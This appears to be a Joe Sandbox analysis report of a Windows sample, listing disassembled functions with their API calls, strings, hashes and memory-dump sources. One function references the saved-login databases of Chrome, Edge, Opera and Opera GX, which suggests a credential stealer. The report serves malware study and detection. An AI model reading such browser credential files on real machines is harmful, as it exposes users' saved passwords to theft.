Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
String ID:
API String ID: 1934640635-0
Opcode ID: 98303a08728dfcd684c7b2a6bf757241cd9eb580b4b5040bc26e5d7fa5f3f5ac
Instruction ID: 0281763480f4e7dfeddb2fa8d77d98bb05327723f32e783308f1a752fffbf41b
Opcode Fuzzy Hash: 98303a08728dfcd684c7b2a6bf757241cd9eb580b4b5040bc26e5d7fa5f3f5ac
Instruction Fuzzy Hash: 9DF0E2B2B112650BD70CB770B80AA6F3298AE603A0B44423BF519C66D1FA29EC68C159

Uniqueness

Uniqueness Score: -1.00%

Function 00444C91 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00444C97

Strings

failed to allocate %u bytes of memory, xrefs: 00444CA9

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: malloc
String ID: failed to allocate %u bytes of memory
API String ID: 2803490479-1168259600
Opcode ID: 1de8da43f564c47b28da153dea50ed58370a57a7fede4f1a7555cf8ab702300c
Instruction ID: e537c710debe3141dbdaba1b7d203d274ffadb740ddfe441f64fdfc05df246b9
Opcode Fuzzy Hash: 1de8da43f564c47b28da153dea50ed58370a57a7fede4f1a7555cf8ab702300c
Instruction Fuzzy Hash: CED0A732A8512473EA111AC0FC02AC63E009B207F5F050031FE0C95321D266895043C1

Uniqueness

Uniqueness Score: -1.00%

Function 023D0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000400,?,?,023D0223,?,?), ref: 023D0E19
SetErrorMode.KERNELBASE(00000000,?,?,023D0223,?,?), ref: 023D0E1E

Memory Dump Source

Source File: 00000007.00000002.2704448307.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_23d0000_16E6.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 56411ebd0f8801349df1e46e72ce85dfc56ad31ca120a804b04ccc5bc591eade
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 56D0123214512877D7002AA4DC09BCD7B1CDF05F66F008011FB0DD9080C770964046E5

Uniqueness

Uniqueness Score: -1.00%

Function 0048A410 Relevance: 2.6, APIs: 2, Instructions: 120COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000000,?,?,?,?), ref: 0048A49F
memmove.VCRUNTIME140(0000003C,?,?,00000000,00000000,?,?,?,?), ref: 0048A4C1

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmovememset
String ID:
API String ID: 1288253900-0
Opcode ID: 0af9b925be931300b19a30d4cb33ea0e0367a478fd5f6c988d137204c7c20c0d
Instruction ID: 4bee388460c2a4de288b6d2a01e5bf42f672b37e21dedc90191357af5a90198a
Opcode Fuzzy Hash: 0af9b925be931300b19a30d4cb33ea0e0367a478fd5f6c988d137204c7c20c0d
Instruction Fuzzy Hash: 7B414C71100105ABEB15EF19D444BEAB7E4BF85304F58057FDC588B342D7B49855C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00426E10 Relevance: 2.6, APIs: 2, Instructions: 89COMMON

Download Yara Rule

APIs

_CxxThrowException.VCRUNTIME140(?,00555480,-000000FC), ref: 00426ED6
_CxxThrowException.VCRUNTIME140(?,00555750,?,?,?,-000000FC), ref: 00426F09

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: ExceptionThrow
String ID:
API String ID: 432778473-0
Opcode ID: b178ca3b3fd16454a03d4ccf61aa6eba3557482f86785f3c761727fc578b3118
Instruction ID: 5654475acf9f8d853b58b335bd70098741c6980996818ba089a46a6a5dc8a0b8
Opcode Fuzzy Hash: b178ca3b3fd16454a03d4ccf61aa6eba3557482f86785f3c761727fc578b3118
Instruction Fuzzy Hash: 1331C772A00618ABCF10DF90D841B9FB7B9FF44304F94492EE415A7685E739BA45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00411630 Relevance: 2.0, APIs: 1, Instructions: 537COMMON

Download Yara Rule

APIs

Part of subcall function 0052040F: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00405356,00000038,?,?,811C9DC5,3A5313C3,?,?), ref: 00520424

Part of subcall function 0052040F: _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00405356,00000038,?,?,811C9DC5,3A5313C3,?,?), ref: 00520417
Part of subcall function 0052040F: _CxxThrowException.VCRUNTIME140(?,00554334,?), ref: 00521423

Part of subcall function 004105A0: memchr.VCRUNTIME140(?,?,?,3A5313C3), ref: 00410636
Part of subcall function 004105A0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,3A5313C3), ref: 004106E2

Part of subcall function 00404970: memmove.VCRUNTIME140(00000000,iS@,iS@,00000000,811C9DC5,?,?,00405369,?), ref: 00404A16

Part of subcall function 00410090: SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?,3A5313C3), ref: 00410109

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00411D65

Part of subcall function 00521940: CloseHandle.KERNEL32(?,3A5313C3,?,-000000FF,00530DD0,000000FF,?,0040F75A,?,00522585,00000000), ref: 00521985

Part of subcall function 00521A70: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,3A5313C3,00000000,0052C9C0,000000FF,?,0040F760,?,?,00522585,00000000,0055A400), ref: 00521A95

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseExceptionFolderHandlePathThrow_callnewhfreemallocmemchrmemmove
String ID:
API String ID: 2370778134-0
Opcode ID: 8d93bb8a50135c73b0a0c6f3e2d8dcb0a60f4aa85fb7fc88169b496b8c3fd8bb
Instruction ID: 78051d0e3cb96816f05690a23d9b4dffc7cbe1ed7e4974194b38c05a1efa4acc
Opcode Fuzzy Hash: 8d93bb8a50135c73b0a0c6f3e2d8dcb0a60f4aa85fb7fc88169b496b8c3fd8bb
Instruction Fuzzy Hash: 0E22F470E002189FDB24CF68DD85BDEBBB5AF45304F148299E119B7391D778AA84CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00427130 Relevance: 1.6, APIs: 1, Instructions: 149COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,3A5313C3,?,00000000), ref: 004271A7

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: cf65d1d2af425bafd4747bc2600b35944600dfbe25e1a2e97e4a1a88aae2ca36
Instruction ID: 7b570f933b99c8bbaca7c4b8cea390dbe614adf3f0ae3d1fcdadc05c0c4d0340
Opcode Fuzzy Hash: cf65d1d2af425bafd4747bc2600b35944600dfbe25e1a2e97e4a1a88aae2ca36
Instruction Fuzzy Hash: 9C51BD71604712DFC728CF2CE885A56B7E1BF89310F54466EE89887791D734EC60CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00450FC0 Relevance: 1.6, APIs: 1, Instructions: 139COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045112C

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: ed4631d31c8e94398969e96ad987536fe87d3c09557c5f78e96c2dc87a96bd3f
Instruction ID: 12a6d46e336d16d1d110641abaa8d9c3b46e87d5668ff884e4f00a14d79ecafe
Opcode Fuzzy Hash: ed4631d31c8e94398969e96ad987536fe87d3c09557c5f78e96c2dc87a96bd3f
Instruction Fuzzy Hash: F151AC306007418FD720CF29C880B67B7E1AFC9745F14496EE89A877A2DB74EC88CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040FEB0 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040FEE1

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: aab6cc24fa5ec9b890d2faa195dfbc3d5423535c753642ba8f35b185339dd3be
Instruction ID: a42300208c5342cd978f66800858ac60f7ca6c67a49139988e2b5863725a1afb
Opcode Fuzzy Hash: aab6cc24fa5ec9b890d2faa195dfbc3d5423535c753642ba8f35b185339dd3be
Instruction Fuzzy Hash: 772171709003198BEB34DF24D8157EAB7B4FF49704F0046EEE5896B681EBB55A888FC4

Uniqueness

Uniqueness Score: -1.00%

Function 0043FDF0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0043BFEF,?,?,04924924,?,?,0042714F,?,?,?,?,?), ref: 0043FE87

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 329b19dfbfa1a51acaf3121768592977cab19f393a3eacc54397826124165395
Instruction ID: 2db9a7ccd5a0ed83c0b84dca688c2be9732591a1e17e01a4d420b0eead28b12e
Opcode Fuzzy Hash: 329b19dfbfa1a51acaf3121768592977cab19f393a3eacc54397826124165395
Instruction Fuzzy Hash: C611E5315105404BE72C9F24EC9D72A77A2EF59314F540B1DE046C7EA2D778B988C748

Uniqueness

Uniqueness Score: -1.00%

Function 00405CF0 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00405892,00000000,?,00000000,?,00000000), ref: 00405D77

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 7381d5f8ec37784e6766107a214d890df65db6ec00ed678ccb99540f4458498c
Instruction ID: 7233ef8430c9b4db7914f65053a59ffafd127d4b6ea940d9526d0d6175b78a41
Opcode Fuzzy Hash: 7381d5f8ec37784e6766107a214d890df65db6ec00ed678ccb99540f4458498c
Instruction Fuzzy Hash: 11019B711109404BE73C9B28E99C72B7AA2DF51311F144F5EE0829BED1D778E9C54B58

Uniqueness

Uniqueness Score: -1.00%

Function 00425E00 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?), ref: 00425E76

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: f1d928cc109868ccd7d3286cbb64136fea88e94f58ff7d46b77c5522aaf4d205
Instruction ID: 89bd60efb9ba44b69738ca21d92cacd9c28278f82698d836242b7b009b0b9e6a
Opcode Fuzzy Hash: f1d928cc109868ccd7d3286cbb64136fea88e94f58ff7d46b77c5522aaf4d205
Instruction Fuzzy Hash: C801F77360183247D72C6B18FD4531AF755AB44320F4A462BDD54AF781D774BE5086C4

Uniqueness

Uniqueness Score: -1.00%

Function 004235E0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

_vcomp_fork.VCOMP140(00000001,00000002,0052A990,00000004), ref: 004235ED

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: _vcomp_fork
String ID:
API String ID: 3592199487-0
Opcode ID: 255cb8fb4c402be717240c8c58811e52b37cec05fd8e915b7b4040763506b0a2
Instruction ID: d004bf3aa797105258a12d2f5f97f7e9649b0aee1350f49d54eac9a48231ad1e
Opcode Fuzzy Hash: 255cb8fb4c402be717240c8c58811e52b37cec05fd8e915b7b4040763506b0a2
Instruction Fuzzy Hash: 9FB012E1BD031139F01923006C0FF9215045B41F20F590148730A2C0C3B5C128900076

Uniqueness

Uniqueness Score: -1.00%

Function 004459C0 Relevance: 1.4, APIs: 1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 185bc8d53e6a9016816b81c8a76cf57183da1b84702a50683406bd8297cf1154
Instruction ID: 22e4469b95873bd5e885b1eced33e494d1dbb9cfc8eef045634c71f072f14ed2
Opcode Fuzzy Hash: 185bc8d53e6a9016816b81c8a76cf57183da1b84702a50683406bd8297cf1154
Instruction Fuzzy Hash: B131FB33700A0857EF245959BCC11EBF396EBC4325F04467FFE5D82302EA665C584295

Uniqueness

Uniqueness Score: -1.00%

Function 0041BFC0 Relevance: 1.3, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_CxxThrowException.VCRUNTIME140(?,00555480,000000FF), ref: 0041DE87

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: ExceptionThrow
String ID:
API String ID: 432778473-0
Opcode ID: fd62919b6451c921e0c9b4bac19b1100dad8c83534bf29d01f244e65ec2c6cf8
Instruction ID: fcc84068b322872598073b0c7f2860bbcffc116603cfe47e48f2684e15ce77a4
Opcode Fuzzy Hash: fd62919b6451c921e0c9b4bac19b1100dad8c83534bf29d01f244e65ec2c6cf8
Instruction Fuzzy Hash: 2E219570D0121C9BDB14EBA5CD46BDEBB78AB05714F0045AAF518A36C2DB346A488E66

Uniqueness

Uniqueness Score: -1.00%

Function 004C6850 Relevance: 1.3, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(00000000,004C9829,004C9829,8BEC4D8C,0000000F,00000010,00000000,?,004C9829,0000000F), ref: 004C68C3

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: 38ef0c50a8b9f455b3f0f8ff80dde10a0ca7b194e0a97de6ed4ac392613310f5
Instruction ID: 5148c2af9d1130f85f1b7ceb2491655ee40d9b764415d13da5d9d11183230fe0
Opcode Fuzzy Hash: 38ef0c50a8b9f455b3f0f8ff80dde10a0ca7b194e0a97de6ed4ac392613310f5
Instruction Fuzzy Hash: 14117CB16013049FD7209F68E880B46FBF8FB99364F104A2FE585C7200E7B5AA94C7E4

Uniqueness

Uniqueness Score: -1.00%

Function 02309485 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 023094D6

Memory Dump Source

Source File: 00000007.00000002.2704339035.0000000002309000.00000040.00000020.00020000.00000000.sdmp, Offset: 02309000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2309000_16E6.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 211bc50f31ac2d6e68c9dc965d2b9e20865f3456ea6064b52ca24bf40b20150c
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: A5113C79A00208EFDB01DF98C985E99BBF5EF08750F058094F9489B3A2D371EA90DF90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00446080 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 491COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 0044629B
__aulldvrm.LIBCMT ref: 004462FD

Strings

0123456789ABCDEF0123456789abcdef, xrefs: 004462D9
-, xrefs: 0044649F
-x0, xrefs: 00446374
F, xrefs: 004461CA
NaN, xrefs: 00446575

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: __aulldvrm__aullrem
String ID: -$-x0$0123456789ABCDEF0123456789abcdef$F$NaN
API String ID: 3564415196-1172252854
Opcode ID: 05bf76fe014435e64100b7884e8ca3dfde8c6135f0a6f1cf70bbbedfb20d1488
Instruction ID: 0db64fff95cb44dba286905d771be8f5525c9a999c80f8d906d792a6be93069e
Opcode Fuzzy Hash: 05bf76fe014435e64100b7884e8ca3dfde8c6135f0a6f1cf70bbbedfb20d1488
Instruction Fuzzy Hash: 1E128A70A0CB818FE719CF28809066BFBE1AFD6304F19895EE48597352D779D846CB87

Uniqueness

Uniqueness Score: -1.00%

Function 00452270 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 431COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00452543
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00452705

Strings

f66f7a17b78ba617acde90fc810107f34f1a1f2e, xrefs: 004523D5
cannot open file at line %d of [%.10s], xrefs: 004523DF
@D, xrefs: 004524CD

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: @D$cannot open file at line %d of [%.10s]$f66f7a17b78ba617acde90fc810107f34f1a1f2e
API String ID: 885266447-3698670431
Opcode ID: f054eb5c3b43264e7a5d2a6781892e6dd0cec7e525449b8704b6f91be5988b7d
Instruction ID: 7d7573416b30f562399edb1914964e8790ea57d2783f4cae809786f66dcf943c
Opcode Fuzzy Hash: f054eb5c3b43264e7a5d2a6781892e6dd0cec7e525449b8704b6f91be5988b7d
Instruction Fuzzy Hash: 39F1C270604612ABD714CB24C950B6BB7E1BF86315F04866FEC489B392D7B8EC89C7D5

Uniqueness

Uniqueness Score: -1.00%

Function 00401250 Relevance: 8.8, Strings: 7, Instructions: 51COMMON

Download Yara Rule

Strings

\Opera Software\Opera GX Stable\Login Data, xrefs: 0040129B
\Google\Chrome\User Data\Default\Login Data, xrefs: 00401274
lg, xrefs: 00401279
\Opera Software\Opera Stable\Login Data, xrefs: 004012D5
xlg, xrefs: 0040128A, 00401291, 004012B4
fg, xrefs: 004012C4, 004012CB, 004012EE
\Microsoft\Edge\User Data\Default\Login Data, xrefs: 0040130F

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: fg$\Google\Chrome\User Data\Default\Login Data$\Microsoft\Edge\User Data\Default\Login Data$\Opera Software\Opera GX Stable\Login Data$\Opera Software\Opera Stable\Login Data$xlg$lg
API String ID: 2016347663-189712416
Opcode ID: daa09d152296ab9c12f4ad53efa4a2374200232d93cfe0715b7223681742a426
Instruction ID: c7abf4e92e185119eaae6b766b30af1a8ddbcbac3345df3297a181120a363e6b
Opcode Fuzzy Hash: daa09d152296ab9c12f4ad53efa4a2374200232d93cfe0715b7223681742a426
Instruction Fuzzy Hash: 8F115EB06583849BE301DF61EC6AB197FF0F769B0AF105269E5042B3D2C7B9140CAB56

Uniqueness

Uniqueness Score: -1.00%

Function 00521199 Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 005211AF

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: d8be87071c5560decab3c3e0ac67f37624878e1f4a7317c5294a2e46ce7533a7
Instruction ID: ae926351a7d4fcce531367fa00c0cd1b6a9a2f47ded20931101a7c1c5fd14264
Opcode Fuzzy Hash: d8be87071c5560decab3c3e0ac67f37624878e1f4a7317c5294a2e46ce7533a7
Instruction Fuzzy Hash: CE51C0B2900715CBEB28CF95E8D17AABBF0FF69305F24846AE404EB290D3309944CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004C5170 Relevance: 31.9, APIs: 16, Strings: 2, Instructions: 395COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,000000B0,3A5313C3,?,00000000,00000001), ref: 004C51C9
??0?$basic_ios@_WU?$char_traits@_W@std@@@std@@IAE@XZ.MSVCP140(?,00000000,00000001), ref: 004C51E8
??0?$basic_iostream@_WU?$char_traits@_W@std@@@std@@QAE@PAV?$basic_streambuf@_WU?$char_traits@_W@std@@@1@@Z.MSVCP140(?,00000000,?,00000000,00000001), ref: 004C520E
??0?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAE@XZ.MSVCP140(?,00000000,00000001), ref: 004C5248
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004C5569
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004C5578
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 004C55B1
??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV01@K@Z.MSVCP140(?,?,00000000,00000001), ref: 004C55C0
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004C5627
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004C5636
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 004C566E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 004C57E1
??1?$basic_iostream@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP140(?,00000000,00000001), ref: 004C5864
??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,00000000,00000001), ref: 004C586D
_CxxThrowException.VCRUNTIME140(?,005557D8,?,00000000,?,00000000,00000001), ref: 004C58C7

Strings

Unknown data type, xrefs: 004C5605
hL, xrefs: 004C524E

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: ArraySafeU?$char_traits@_$W@std@@@std@@$Bound$Element$??0?$basic_ios@_??0?$basic_iostream@_??0?$basic_streambuf@_??1?$basic_ios@??1?$basic_iostream@_??6?$basic_ostream@_D@std@@@std@@ExceptionThrowU?$char_traits@V01@V?$basic_streambuf@_W@std@@@1@@_invalid_parameter_noinfo_noreturnmemset
String ID: Unknown data type$hL
API String ID: 2475297879-1718402672
Opcode ID: 76537a309d0b08a0e4afd13490262c0d40d37190d5b9bce650379f8de31b9bb6
Instruction ID: ac8bf37014d060ebed9cbf68ea5f3ee7266bbea3383ed2d8ad936949b4589670
Opcode Fuzzy Hash: 76537a309d0b08a0e4afd13490262c0d40d37190d5b9bce650379f8de31b9bb6
Instruction Fuzzy Hash: 40F1CD34A016588FCB64DF54DC99BEEBBB4FB44304F10809EE409A7291D774AE84CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 004B44D0 Relevance: 31.8, APIs: 3, Strings: 18, Instructions: 281COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,SEARCH,SEARCH), ref: 004B45DD
memmove.VCRUNTIME140(?, USING INTEGER PRIMARY KEY , USING INTEGER PRIMARY KEY ), ref: 004B4782
memmove.VCRUNTIME140(?,(rowid>?),(rowid>?)), ref: 004B47C8

Strings

SEARCH, xrefs: 004B457C, 004B45BD, 004B45DB
SCAN, xrefs: 004B4577
AS %s, xrefs: 004B4617
SUBQUERY %d, xrefs: 004B45EF
USING INTEGER PRIMARY KEY , xrefs: 004B4734, 004B474A, 004B4758, 004B475F, 004B477C
(rowid=?), xrefs: 004B470F
VIRTUAL TABLE INDEX %d:%s, xrefs: 004B47E4
USING , xrefs: 004B4696, 004B46A9
d, xrefs: 004B4590
(rowid<?), xrefs: 004B472C
AUTOMATIC COVERING INDEX, xrefs: 004B4670
(rowid>?), xrefs: 004B4727, 004B47A5, 004B47C6
TABLE %s, xrefs: 004B45F9, 004B45FF
(rowid>? AND rowid<?), xrefs: 004B471D
0, xrefs: 004B4716
COVERING INDEX %s, xrefs: 004B467A
INDEX %s, xrefs: 004B467F
PRIMARY KEY, xrefs: 004B4652

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmove
String ID: AS %s$ SUBQUERY %d$ TABLE %s$ USING $ USING INTEGER PRIMARY KEY $ VIRTUAL TABLE INDEX %d:%s$(rowid<?)$(rowid=?)$(rowid>? AND rowid<?)$(rowid>?)$0$AUTOMATIC COVERING INDEX$COVERING INDEX %s$INDEX %s$PRIMARY KEY$SCAN$SEARCH$d
API String ID: 2162964266-2251401851
Opcode ID: 20fd56e4ced961b9ed702b67f0f06672a70b7a98b2032c0f9af3ccc842fb3322
Instruction ID: 5455d230958dcd62d608caa803cb9037f08201895db428c8a3f846cdb9a9cf74
Opcode Fuzzy Hash: 20fd56e4ced961b9ed702b67f0f06672a70b7a98b2032c0f9af3ccc842fb3322
Instruction Fuzzy Hash: E5B1D1719053419FD714DF28C8457ABBBE0BFD5318F14092EE88987392E739E906CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0042E300 Relevance: 24.9, APIs: 9, Strings: 5, Instructions: 430COMMON

Download Yara Rule

APIs

Part of subcall function 00404C60: memmove.VCRUNTIME140(Google Chrome,?,?), ref: 00404C8D

memmove.VCRUNTIME140(0000000F,00000006,?,while parsing ,-0000000F,syntax error ,0000000D,3A5313C3,?,?), ref: 0042E3F9
memmove.VCRUNTIME140(00000010,00000000,00000000,00000000,00000000,00000020,?,00000000,00000006,?,while parsing ,-0000000F,syntax error ,0000000D,3A5313C3,?), ref: 0042E47F
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00000000,00000000,00000000,00000000,00000020,?,00000000,00000006,?,while parsing ,-0000000F,syntax error ,0000000D,3A5313C3), ref: 0042E4CF
